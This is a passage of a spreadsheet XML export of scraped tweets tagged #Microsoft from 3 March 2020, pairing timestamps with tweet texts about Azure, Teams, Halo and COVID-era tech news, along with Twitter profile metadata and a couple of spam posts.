    <t>Tue Mar 03 20:53:09 +0000 2020</t>
  </si>
  <si>
    <t>Join @meetdux and #Microsoft's Michael Feuda for our Empower Hour where you'll learn important strategies that will make your team more efficient in #MicrosoftTeams! 
Register for free here: https://t.co/TxniBwlApR https://t.co/KONuZiOYgk</t>
  </si>
  <si>
    <t>Tue Mar 03 20:53:01 +0000 2020</t>
  </si>
  <si>
    <t>Google cancels I/O 2020, its biggest event of the year https://t.co/uSSf8oudWn #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 20:52:28 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "UK NCSC Releases Tips on Securing Smart Security Cameras:" https://t.co/D2v7W7DnCR
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Tue Mar 03 20:50:03 +0000 2020</t>
  </si>
  <si>
    <t>This could be #Microsoft's most important product in 2020. If it works https://t.co/Bohv5TrL8H #TechJunkieNews https://t.co/NLtynYUhvh</t>
  </si>
  <si>
    <t>Tue Mar 03 20:49:15 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft : Azure IoT introduces seamless integration with Cisco IoT #Microsoft #Stock #MarketScreener https://t.co/oid21blTKA https://t.co/7zF0ieHWzK</t>
  </si>
  <si>
    <t>{'id': 102325185, 'id_str': '102325185', 'name': 'MarketScreener.com', 'screen_name': 'Market_Screener', 'location': '', 'description': 'Find all financials news in real time. Equities, Indexes, Commodities, Currencies, Analysis, Top &amp; Flop #MarketScreener', 'url': 'https://t.co/O2QH5VgwDT', 'entities': {'url': {'urls': [{'url': 'https://t.co/O2QH5VgwDT', 'expanded_url': 'http://www.marketscreener.com', 'display_url': 'marketscreener.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9763, 'friends_count': 80, 'listed_count': 1238, 'created_at': 'Wed Jan 06 09:33:43 +0000 2010', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1888343,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'http://pbs.twimg.com/profile_images/1041668619531444225/DYWcRasA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041668619531444225/DYWcRasA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102325185/1550585065', 'profile_link_color': '288842',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</si>
  <si>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Tue Mar 03 20:47:10 +0000 2020</t>
  </si>
  <si>
    <t>Stoked to be speaking at #PPOC2020 on March 20th!! Mark your calendars and join online (FREE) to learn how I went from a request to an app launched in 3 days using Microsoft #PowerApps and #PowerAutomate! #PowerPlatform #Microsoft https://t.co/3vTiVsxP68</t>
  </si>
  <si>
    <t>{'id': 604087096, 'id_str': '604087096', 'name': 'Bryant Boyer | #Maker | #Solver | #PowerAddict', 'screen_name': 'TheFlowHawk', 'location': 'Saratoga Springs, UT', 'description': 'Maker/Builder, Change Manager, alumni of @BYU and @BYUCHIUltimate, husband, father, and @BrainStormInc PropellerHead. Member @LDSChurch.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 466, 'friends_count': 555, 'listed_count': 10, 'created_at': 'Sun Jun 10 01:40:36 +0000 2012', 'favourites_count': 3569, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1200,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'http://pbs.twimg.com/profile_images/1153043811313971200/9xgi1RX4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153043811313971200/9xgi1RX4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/604087096/1503425099', 'profile_link_color': 'FFCB05',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</si>
  <si>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20:46:17 +0000 2020</t>
  </si>
  <si>
    <t>Demand in New Zealand for Dynamics 365 Customer Engagement Solutions has allowed @SolgariConverse a Microsoft Business Application ISV Connect Global ISV Connect premium member, and @OASystemsLtd , to begin a strategic Partnership.
https://t.co/p9mVbgJFdr 
#Microsoft #Solgari</t>
  </si>
  <si>
    <t>Tue Mar 03 20:44:50 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for PostgreSQLPlanned maintenance notifications now in preview  https://t.co/9kbaGW0IJq  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Tue Mar 03 20:42:11 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for PostgreSQLPlanned maintenance notifications now in preview  https://t.co/9kbaGW0IJq   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Tue Mar 03 20:41:35 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for PostgreSQLPlanned maintenance notifications now in preview
- receive alerts about upcoming planned maintenance to your Azure Database for PostgreSQL
https://t.co/n4ybl1lfjE
#Azure #Microsoft #Cloud #Database #PlannedMaintenace #PostgreSQL https://t.co/ZQB6JT5Y2I</t>
  </si>
  <si>
    <t>Tue Mar 03 20:40:54 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Database for PostgreSQLPlanned maintenance notifications now in preview https://t.co/5yl9s7LS99</t>
  </si>
  <si>
    <t>Tue Mar 03 20:39:59 +0000 2020</t>
  </si>
  <si>
    <t>The pope, with #Microsoft and #IBM, calls for #AI ethics. #EthicalAI https://t.co/N9d2z7VnvR</t>
  </si>
  <si>
    <t>Tue Mar 03 20:39:13 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for PostgreSQLPlanned maintenance notifications now in preview: https://t.co/M2RQ1LIUY9 #Azure #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 20:36:21 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft can offer #Hangouts and #Teams for free to compete with #Slack and #Zoom. 
Consumers should have access to #WFH tools, especially during #Covid_19 scare. 
Multiple things can be true.</t>
  </si>
  <si>
    <t>{'id': 71112815, 'id_str': '71112815', 'name': 'SooS', 'screen_name': 'xsillent', 'location': '', 'description': 'Ð˜Ð·Ð²Ð¸Ð½Ð¸ Ñ Ð½Ðµ Ñ€ÑƒÑÑÐºÐ°Ñ\n\nÐºÐ°ÐºÐ¾Ð²Ð° ÑÑ‚Ð¾Ð¸Ð¼Ð¾ÑÑ‚ÑŒ Ð»Ð¶Ð¸?', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 76, 'friends_count': 330, 'listed_count': 5, 'created_at': 'Wed Sep 02 23:42:45 +0000 2009', 'favourites_count': 24554, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6491,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'http://pbs.twimg.com/profile_images/1203440720964702208/DBVPxkHd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203440720964702208/DBVPxkHd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/71112815/1575757756',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</si>
  <si>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20:36:00 +0000 2020</t>
  </si>
  <si>
    <t>This recent post explains how to process an emailed file into a Power BI report using #Microsoft #Flow. Note: this assumes prior knowledge of #Power #BI #Desktop and describes just the steps needed to incorporate the file into the Power BI #Query #Editor. https://t.co/J2DvssFPO4 https://t.co/l1DIBcQXWV</t>
  </si>
  <si>
    <t>Tue Mar 03 20:34:55 +0000 2020</t>
  </si>
  <si>
    <t>#Global stock #markets dropped. #Coronavirus kills more than 3,000 #worldwide. VP #Biden received last minute endorsements. #Nigeria overtake #SA as #Africa largest economy. #Google &amp;amp; #Microsoft cancelled #conferences . #Pop #Francis test negative. #US #Fed cuts #rates https://t.co/gN6JG9LMqi</t>
  </si>
  <si>
    <t>{'id': 958451837123915776, 'id_str': '958451837123915776', 'name': 'Brandcodes', 'screen_name': 'Brandcodes', 'location': 'Global', 'description': 'brands + clouds + domains + health + opinions + charities + retweets + sports', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 34, 'friends_count': 16, 'listed_count': 1, 'created_at': 'Tue Jan 30 21:28:19 +0000 2018', 'favourites_count': 443, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2357,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'http://pbs.twimg.com/profile_images/1231612753611239427/sF2DBLCT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231612753611239427/sF2DBLCT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/958451837123915776/1579477417',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</si>
  <si>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20:34:49 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">So I finally got access to the GitHub beta for iOS...
Nice, but not what I was expecting. Hopefully additional functionality is added, other than issue management before release.
But a good start I guess...
#apple #testflight #github #microsoft #Developer </t>
  </si>
  <si>
    <t>Tue Mar 03 20:32:10 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, Cargas Systems delivers the data, security and AI you need to build an agile data estate. https://t.co/KQYpPabpfq</t>
  </si>
  <si>
    <t>Tue Mar 03 20:31:31 +0000 2020</t>
  </si>
  <si>
    <t>You guys my anxiety is still making me over think about what apps I should be using (#Google or #Microsoft) and I need one of you to slap me out of it because it doesn't matter.</t>
  </si>
  <si>
    <t>{'id': 22735548, 'id_str': '22735548', 'name': 'TKHP', 'screen_name': 'BobLoblaw574', 'location': 'Des Moines, Iowa', 'description': 'Photographer/Writer/Iowa and Des Moines aficionado.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 359, 'friends_count': 355, 'listed_count': 18, 'created_at': 'Wed Mar 04 04:52:30 +0000 2009', 'favourites_count': 8344, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10983,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'http://pbs.twimg.com/profile_images/1220874850060984320/XB41mkNK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220874850060984320/XB41mkNK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22735548/1579906966', 'profile_link_color': 'FAB81E',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</si>
  <si>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Tue Mar 03 20:30:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft keeps improving the #Teams platform by adding new #Outlook integration, chat updates and more. Check out the new features. https://t.co/yTiKhS0Iqr</t>
  </si>
  <si>
    <t>{'id': 30938268, 'id_str': '30938268', 'name': 'RAK Consulting, Inc.', 'screen_name': 'rakconsulting', 'location': 'Aurora, IL', 'description': 'Communications Consulting | Technology News | Industry Insights Since 1995. #Telecommunications #Wireless #News', 'url': 'http://t.co/htYAo8CYBY', 'entities': {'url': {'urls': [{'url': 'http://t.co/htYAo8CYBY', 'expanded_url': 'http://www.rakconsulting.com', 'display_url': 'rakconsulting.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 78, 'friends_count': 155, 'listed_count': 51, 'created_at': 'Mon Apr 13 19:34:08 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4098,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'http://pbs.twimg.com/profile_images/378800000771479351/33dc2f751ca238d77475a1b43703e810_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000771479351/33dc2f751ca238d77475a1b43703e810_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/30938268/1359754992', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 20:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's latest #cloud innovation: #Printing https://t.co/fijuyiOnm7 via @theregister</t>
  </si>
  <si>
    <t>Tue Mar 03 20:28:14 +0000 2020</t>
  </si>
  <si>
    <t>. #AWS to double sales droids as #Google, #Microsoft 's growing clouds threaten to gobble larger slices of Bezos' pie https://t.co/Zb69XpfoEM via @theregister</t>
  </si>
  <si>
    <t>{'id': 19206934, 'id_str': '19206934', 'name': 'Witold Kepinski', 'screen_name': 'WitoldKepinski', 'location': 'Netherlands', 'description': 'Tech Business | Events | Channel Partners | IT| cloud | data | mobile | security | marketing | sales | politics | history | social | redactie@dutchitchannel.nl', 'url': 'https://t.co/PW2R9id2O8', 'entities': {'url': {'urls': [{'url': 'https://t.co/PW2R9id2O8', 'expanded_url': 'http://www.dutchitchannel.nl', 'display_url': 'dutchitchannel.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4325, 'friends_count': 3318, 'listed_count': 458, 'created_at': 'Mon Jan 19 22:54:24 +0000 2009', 'favourites_count': 198, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 51459,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'http://pbs.twimg.com/profile_images/772525056165605376/Ie8Iyyzy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/772525056165605376/Ie8Iyyzy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19206934/1475843542',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</si>
  <si>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20:26:32 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for PostgreSQLPlanned maintenance notifications now in preview https://t.co/hvDyCxDWty #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Tue Mar 03 20:25:04 +0000 2020</t>
  </si>
  <si>
    <t>Halo Combat Evolved Anniversary is now available on Xbox Game Pass PC and Steam
https://t.co/xx358KIsPy
#halo #haloce #halocombatevolved #343industries #bungie #microsoft #pc #steam #XboxGamePass #xbox #tech #technology #consolegaming #pcgaming #swinfix</t>
  </si>
  <si>
    <t>{'id': 1217198338057043969, 'id_str': '1217198338057043969', 'name': 'Swinfix', 'screen_name': 'swinfix', 'location': 'Swindon, England', 'description': 'We are a tech repair company specialising in computer repairs and custom gaming rigs based in Swindon. We fix computers, laptops, smartphones and tablets.', 'url': 'https://t.co/2cDXKyK1q5', 'entities': {'url': {'urls': [{'url': 'https://t.co/2cDXKyK1q5', 'expanded_url': 'http://swinfix.co.uk', 'display_url': 'swinfix.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Tue Jan 14 21:34:42 +0000 2020', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 30, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217198419346886656/YkYSvLEQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217198419346886656/YkYSvLEQ_normal.jpg',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</si>
  <si>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20:24:38 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Azure Database for PostgreSQLPlanned maintenance notifications now in preview https://t.co/qoy7PkBNcH #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 20:22:19 +0000 2020</t>
  </si>
  <si>
    <t>This is top of mind for many as people consider whether to work remotely or not.  See how a Shanghai-based Microsoft employee and her team have been working remotely during the COVID-19 outbreak. #Microsoft #Teams https://t.co/PDkgy27K3x #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 20:21:50 +0000 2020</t>
  </si>
  <si>
    <t>Stem the tide #AI #coronavirus #diagnosing #alibaba #China #Amazon #Microsoft #healthcare #pharma #medicine #WHO https://t.co/LcGFSVTTlK</t>
  </si>
  <si>
    <t>{'id': 1174002478838366208, 'id_str': '1174002478838366208', 'name': 'Rob Morris', 'screen_name': 'RobMorr20185743', 'location': 'Gilbert, AZ', 'description': 'https://t.co/P9lmaGMMcL #data #analytics #automation #machinelearning #blockchain #logistics #supplychain #risk  #benchpress #autismresearch', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/P9lmaGMMcL', 'expanded_url': 'http://linkedin.com/in/rob-morris-3935595', 'display_url': 'linkedin.com/in/rob-morris-â€¦', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 103, 'friends_count': 208, 'listed_count': 1, 'created_at': 'Tue Sep 17 16:49:51 +0000 2019', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 517, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1174012492961521665/5Lc2asW4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1174012492961521665/5Lc2asW4_normal.jpg',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</si>
  <si>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20:17:26 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure Database for PostgreSQLPlanned maintenance notifications now in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/OlSCrmhu5t</t>
  </si>
  <si>
    <t>Tue Mar 03 20:12:16 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft Teams Thursday New England schedule announced for April 2 in Burlington, MA. Register now. Limited seats still available. #microsoftteams #microsoftazure https://t.co/8eB1yEYEFv</t>
  </si>
  <si>
    <t>Tue Mar 03 20:11:41 +0000 2020</t>
  </si>
  <si>
    <t>Lets hear about Securing #Azure #Networks with @mbradl03
#NAUG #NorthernAzureUserGroup #MicrosoftAzure #microsoft #meetup https://t.co/nvmwuwlc43</t>
  </si>
  <si>
    <t>{'id': 1016962568433348608, 'id_str': '1016962568433348608', 'name': 'Northern Azure User Group', 'screen_name': 'NorthernAzureUG', 'location': 'Manchester, England', 'description': 'The NAUG (Northern Azure User GROUP) founded in 2018 with an ambition of bringing together the IT community who have a passion for Microsoft and Azure', 'url': 'https://t.co/1ZBZki91Ru', 'entities': {'url': {'urls': [{'url': 'https://t.co/1ZBZki91Ru', 'expanded_url': 'https://www.meetup.com/Northern-Azure-User-Group', 'display_url': 'meetup.com/Northern-Azureâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 100, 'friends_count': 26, 'listed_count': 2, 'created_at': 'Wed Jul 11 08:29:05 +0000 2018', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 38, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1156265935386419200/FURZp7VS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156265935386419200/FURZp7VS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1016962568433348608/1532007790',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</si>
  <si>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20:11:25 +0000 2020</t>
  </si>
  <si>
    <t>#HALO: COMBAT EVOLVED ANNIVERSARY is available now for #PC with THE MASTER CHIEF COLLECTION... #Steam #Microsoft https://t.co/B3BO4LZBEv https://t.co/GvRxd5GY4p</t>
  </si>
  <si>
    <t>{'id': 1144715812802048000, 'id_str': '1144715812802048000', 'name': 'Gameplay Mechanix', 'screen_name': 'Game_Mechanix', 'location': 'Warsaw', 'description': 'Gameplay Mechanix is your best source for video game news, mostly focused on titles from Poland ðŸ‡µðŸ‡± and ðŸ‡¯ðŸ‡µ Japan. Avoiding clickbait at all costs.', 'url': 'https://t.co/0q4sUZuGMB', 'entities': {'url': {'urls': [{'url': 'https://t.co/0q4sUZuGMB', 'expanded_url': 'http://gameplaymechanix.com', 'display_url': 'gameplaymechanix.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 26, 'listed_count': 1, 'created_at': 'Fri Jun 28 21:14:52 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 212, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1213830753966014466/uWyWeoIP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1213830753966014466/uWyWeoIP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1144715812802048000/1578234604',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</si>
  <si>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20:10:01 +0000 2020</t>
  </si>
  <si>
    <t>What Fiction Writing Software Is Best for You?
#microsoft #google #writingsoftware #wordprocessor #writingtips #paperandpens #reusablenotebooks #rocketbook
https://t.co/COXPAJl4De</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</si>
  <si>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20425, 'friends_count': 21659, 'listed_count': 166, 'created_at': 'Thu Jun 25 16:20:49 +0000 2009', 'favourites_count': 4530, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 68667,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</si>
  <si>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Tue Mar 03 20:05:35 +0000 2020</t>
  </si>
  <si>
    <t>Do you miss the naked female body? Come to my site #Susquehanna County   #microsoft #trump https://t.co/CmKLuDtw5x</t>
  </si>
  <si>
    <t>{'id': 1234870860814725125, 'id_str': '1234870860814725125', 'name': 'Kristine Marie', 'screen_name': 'captgalithumb', 'location': 'Pittsburgh, USA', 'description': 'Love comes unseen', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 11, 'listed_count': 0, 'created_at': 'Tue Mar 03 15:58:57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'http://pbs.twimg.com/profile_images/1234885458460643333/XiqbiL7i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234885458460643333/XiqbiL7i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234870860814725125/1583254754',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</si>
  <si>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20:02:54 +0000 2020</t>
  </si>
  <si>
    <t>Sorry for the wait guys.
Nobody wants a #FREE #Montage and I'm still waiting on my customized controller. The new headset came in.
Stay watching 
https://t.co/0LPVxnL4Hd
#fortnite #battleroyale #twitch #fb #gaming #gamer #pc #xboxone #playstation #microsoft #sony
#callofduty</t>
  </si>
  <si>
    <t>Tue Mar 03 20:02:31 +0000 2020</t>
  </si>
  <si>
    <t>Are you ready to take your organization to the next level? Discover the power of #Microsoft #Project in the cloud!  Learn more: https://t.co/WSxDqK2YFm
 #projectmanagement #MSproject #microsoftproject #projectmanager #PPM https://t.co/OIYB6U0sQM</t>
  </si>
  <si>
    <t>{'id': 580919943, 'id_str': '580919943', 'name': 'Sensei', 'screen_name': 'SenseiPPM', 'location': '', 'description': 'Proactive PPM, Apps, Books, Training, Jumpstarts, Report Packs for Microsoft Project, Project Server and Project Online', 'url': 'http://t.co/iaTKSho7AA', 'entities': {'url': {'urls': [{'url': 'http://t.co/iaTKSho7AA', 'expanded_url': 'http://www.senseiprojectsolutions.com', 'display_url': 'senseiprojectsolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 862, 'friends_count': 155, 'listed_count': 44, 'created_at': 'Tue May 15 12:20:25 +0000 2012', 'favourites_count': 177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1194,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'http://pbs.twimg.com/profile_images/955966835677044736/IDZNRu2U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/955966835677044736/IDZNRu2U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/580919943/1516755269',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</si>
  <si>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20:02:08 +0000 2020</t>
  </si>
  <si>
    <t>Africa Roundup: TLcom closes $71M fund, Jumo raises $55M, AWS partners with Safaricom https://t.co/h2CqAJ1HbS #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 20:01:25 +0000 2020</t>
  </si>
  <si>
    <t>Implement effective project management tools like @Turner Construction Company! Learn how their team harnessed the traction they already had with #Microsoft. Register here: https://t.co/krhptygrgJ
#projectmanagement #MSproject #microsoftproject #projectmanager https://t.co/tYRH30OyLO</t>
  </si>
  <si>
    <t>Tue Mar 03 20:00:43 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azure https://t.co/F66qEjqcxJ #Azure #Microsoft #CloudStrategy</t>
  </si>
  <si>
    <t>Tue Mar 03 20:00:15 +0000 2020</t>
  </si>
  <si>
    <t>How To: Setup Locations in Microsoft Dynamics 365 Business Central
https://t.co/KUyiW93pXK
#microsoft #locations #howto #training</t>
  </si>
  <si>
    <t>Tue Mar 03 20:00:03 +0000 2020</t>
  </si>
  <si>
    <t>Often associated with doomsday scenarios, #AI is helping working parents manage work/life balance. #Microsoft #WomenTechMakers  #Aiforgood
 #iwd2020 #WomenInSTEM #WomenInScience #digitaltransformation https://t.co/jNHj2mJGvp</t>
  </si>
  <si>
    <t>At Microsoft our employees are our greatest asset. Here's how were investing in #technology and #culture to #transform their experience.  #Microsoft #Microsoft365 https://t.co/KYCRFew5va</t>
  </si>
  <si>
    <t>Tue Mar 03 19:59:30 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Please... Can someone explain me this ?  #Washington Grove   #microsoft #culture https://t.co/BTRPrYOMeu</t>
  </si>
  <si>
    <t>{'id': 1234891366674653184, 'id_str': '1234891366674653184', 'name': 'Janice Jenkins', 'screen_name': 'netttatourle', 'location': 'Albuquerque, USA', 'description': 'If I know what love is, it is because of you.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 38, 'listed_count': 0, 'created_at': 'Tue Mar 03 17:20:25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'http://pbs.twimg.com/profile_images/1234898568219176967/yEXmOgRs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234898568219176967/yEXmOgRs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234891366674653184/1583257771',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</si>
  <si>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19:59:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Defender ATP coming to Linux - The Tech Report https://t.co/aMINcYhAAS - https://t.co/o0OWvv6SwR by @nathan_wasson #microsoft https://t.co/wuEvMrur1p</t>
  </si>
  <si>
    <t>{'id': 56449446, 'id_str': '56449446', 'name': 'The Tech Report', 'screen_name': 'thetechreport', 'location': '', 'description': 'PC Hardware Explored', 'url': 'http://t.co/XXE0QoaAMD', 'entities': {'url': {'urls': [{'url': 'http://t.co/XXE0QoaAMD', 'expanded_url': 'http://techreport.com', 'display_url': 'techreport.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6225, 'friends_count': 0, 'listed_count': 258, 'created_at': 'Mon Jul 13 18:23:39 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18408, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E4E7ED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2035202766/532125_10150651306132921_60933942920_9464409_1390628853_n_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2035202766/532125_10150651306132921_60933942920_9464409_1390628853_n_normal.jpg', 'profile_link_color': '354977', 'profile_sidebar_border_color': '3E5587', 'profile_sidebar_fill_color': 'FAFAFA', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 19:57:29 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 19:57:11 +0000 2020</t>
  </si>
  <si>
    <t>Real-World Accounting Solutions https://t.co/OnJdCQRMyh
#Microsoft #Innovation #PowerPlatform #ERP #CRM #BetterTogether #CloudAccounting #BusinessSoftware #CFO #Operational #RealTime #Insights #Entrepreneurs #PowerBI #Dashboards https://t.co/mFdcpw8wuv</t>
  </si>
  <si>
    <t>{'id': 22856801, 'id_str': '22856801', 'name': 'John Silvani', 'screen_name': 'jsilvani', 'location': 'Detroit, MI', 'description': 'Founder @GoGravityOnline #Entrepreneur #Detroiter Passionate about helping #businesses grow. Advocate for #cloud #tech, #CloudERP #Dyn365 #CRM', 'url': 'http://t.co/KCemzxz46D', 'entities': {'url': {'urls': [{'url': 'http://t.co/KCemzxz46D', 'expanded_url': 'http://www.go-gravity.com', 'display_url': 'go-gravity.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 423, 'friends_count': 575, 'listed_count': 110, 'created_at': 'Thu Mar 05 00:59:38 +0000 2009', 'favourites_count': 30, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3832,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'http://pbs.twimg.com/profile_images/1937284266/John_Headshot_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1937284266/John_Headshot_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22856801/1544742356',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</si>
  <si>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19:56:11 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone
https://t.co/ES13HqbZcV
#Microsoft #Azure #Cloud #ExpressRoute #Network</t>
  </si>
  <si>
    <t>Tue Mar 03 19:55:00 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 4 out of 5 of Fortune 500 companies have #Office365 and that it integrates with #MSDyn365? Read the eBook and learn more about the power behind these tools. https://t.co/mflPK9Kub6
#Technology #ArtificialIntelligence #Microsoft #SMBs</t>
  </si>
  <si>
